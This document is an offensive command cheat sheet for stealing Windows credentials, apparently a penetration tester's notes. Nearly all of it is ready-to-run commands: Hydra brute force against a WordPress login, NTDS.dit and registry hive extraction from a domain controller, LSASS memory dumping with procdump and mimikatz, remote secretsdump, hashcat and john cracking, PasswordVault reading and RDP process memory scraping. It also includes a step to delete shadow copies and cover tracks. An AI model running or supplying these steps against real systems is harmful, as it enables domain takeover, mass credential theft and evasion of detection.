#hashcat
haschat --force --stdout pwdlist.txt  -r /usr/share/hashcat/rules/best64.rule 

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.234 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect'

#Remotely with DA clear-text password
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log"
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumneShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit 2>&1 > c:\vss2.log"
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumneShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive 2>&1 > c:\vss2.log"

#Remotely with DA Pass-the-ticket
wmic /authority:"Kerberos:<domain\DC-hostname>" /node:<DC-Hostname> process call create  "..<Same as above>.."

#Remotely via PSRemote 
Powersploit's Invoke-NinjaCopy

#NTDSUtil.exe. Access to DC is required to execute. Tool used by Sysadmins. 
Create an "install from media" makes a copy of NTDS.dit & SYSTEM registry hive:
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

#Create a volume shadow copy
vssadmin create shadow /for=C:

#Retrieve Ntds.dit file from Volume Shadow Copy
copy <Shadow directory>\ntds.dit  c:\Temp\ntds.dit

#Copy SYSTEM & SAM Hive file from registry.
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak

#Delete tracks
vssadmin delete shadows /shadow={<Shadow Copy ID>}

#With DA privs, save NTDS.dit to C:\Temp
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
#Add -history for password history

secretsdump.py -sam SAM -system SYSTEM LOCAL
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

#Remotely extract credentials
sudo python3 secretsdump.py <domain>/<username>:'<pass>'@<IP>
impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6
#Create a file called cmd in C:\windows\temp\

#cmd Contents:
set context persistent nowritersadd volume c: alias tempcreateexpose %temp% h:exit

#Create a shadow volume accessible via the H:
diskshadow /s cmd 

# upload SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll
#https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
Copy -FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy -FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

#Dump memory from LSASS.exe. Using TaskManager(as admin), right-click on process, Create Dump

#procdump is a Windows sysinternal tool.
procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"

#Extract using mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

#pypykatz
pypykatz lsa minidump lsass.DMP
pypykatz lsa minidump lsass.DMP | grep 'NT:' | awk '{print $2}' | sort -u > hashes

hashkiller.co.uk

#NTLMv2
hashcat -m 5600 hash_file rockyou.txt  --force

#Brute-force - Mask attack [https://hashcat.net/wiki/doku.php?id=mask_attack]
hashcat.exe -a 3 -m 5600 hashes.txt -1 ?l?d?u -2 ?u ?2?1?1?1?1?1?1 -o cracked.txt -O

#Rule-based: https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule
hashcat -m 5600 hash.txt rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule

#Download from https://www.volatilityfoundation.org/26

#Identify profile
volatility -f memoryFile.dmp imageinfo 

volatility -f memoryFile.dmp --profile Win2012R2x64 hashdump
hashcat.exe -m 1410 creds.txt wordlist.txt -O

#Crack GPP Password
gpp-decrypt hashed_pass

#.DOCX file
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/office2john.py
python office2john.py dummy.docx > hash.txt
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt

#Load the Credentials and PasswordVault assemblies:
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]

#Instantiate an object of the PasswordVault class to work with:
$vault = New-Object Windows.Security.Credentials.PasswordVault

#Read contents of the vault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

#Run as admin
query user

#Identify svchost process ID
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1

#Dump process memory
#Task-manager: Right-click - Create dump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#Grep for password:
strings -el svchost* | grep Password123 -C3
. .\strings64.exe <Dump.dmp> | Select-String "Grepthis" -Context 3,3
#Mimikatz
privilege::debug ts::logonpasswords